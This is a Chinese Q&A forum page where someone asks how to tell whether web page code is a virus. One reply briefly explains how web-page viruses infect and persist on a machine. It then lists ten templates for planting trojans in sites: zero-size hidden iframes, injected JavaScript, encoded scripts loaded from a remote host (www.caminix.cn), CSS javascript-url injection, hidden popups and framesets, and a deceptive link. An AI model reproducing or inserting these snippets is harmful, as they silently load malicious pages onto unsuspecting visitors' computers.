如何判断一段网页代码是不是病毒?
- 提问者网友:謫仙
- 2021-05-14 17:24
- 五星知识达人网友:轻熟杀无赦
- 2021-05-14 18:17
- 1楼网友:愁杀梦里人
- 2021-05-14 21:40
- 2楼网友:孤独的牧羊人
- 2021-05-14 20:59
你是个男人
- 3楼网友:千夜
- 2021-05-14 19:31
判断网页代码是不是病毒,第一步:网页病毒大多由恶意代码、病毒体(通常是经过伪装成正常图片文件后缀的.exe文件)和脚本文件或JAVA小程序组成,病毒制作者将其写入网页源文件; 第二步:用户浏览上述网页,病毒体和脚本文件以及正常的网页内容一起进入计算机的临时文件夹; 第三步:脚本文件在显示网页内容的同时开始运行,要么直接运行恶意代码,要么直接执行病毒程序,要么将伪装的文件还原为.exe文件后再执行,执行任务包括:完成病毒入驻,修改注册表,嵌入系统进程,修改硬盘分区属性等; 第四步:网页病毒完成入侵,在系统重启后病毒体自我更名、复制、再伪装,接下来的破坏依病毒的性质正式开始; 注:网页病毒的工作或称其为遗传结构是简单的,但这便意味着它们能迅速变异。
挂马代码如下 一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:js变形加密 <SCRIPT language="JScript.Encode" src= http://www.xxx.com/muma.txt> muma.txt可改成任意后缀 四:body挂马 <body onload="window.location='地址';"></body> 五:隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src=" http://www.caminix.cn"></iframe>'; 六:css中挂马 body { background-image: url('javascript:document.write("<script src= http://www.caminix.cn></script>")')} 七:JAJA挂马 <SCRIPT language=javascript> window.open (" http://www.caminix.cn","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> 八:图片伪装 <html> <iframe src="网马地址" height=0 width=0></iframe> <img src="图片地址"></center> </html> 九:伪装调用: <frameset rows="444,0" cols="*"> <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset> 十:高级欺骗 <a href=" http://www.163.com" onMouseOver="www_163_com(); return true;"></a> <SCRIPT Language="JavaScript"> function www_163_com () { var url=" http://www.caminix.cn"; open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); } </SCRIPT>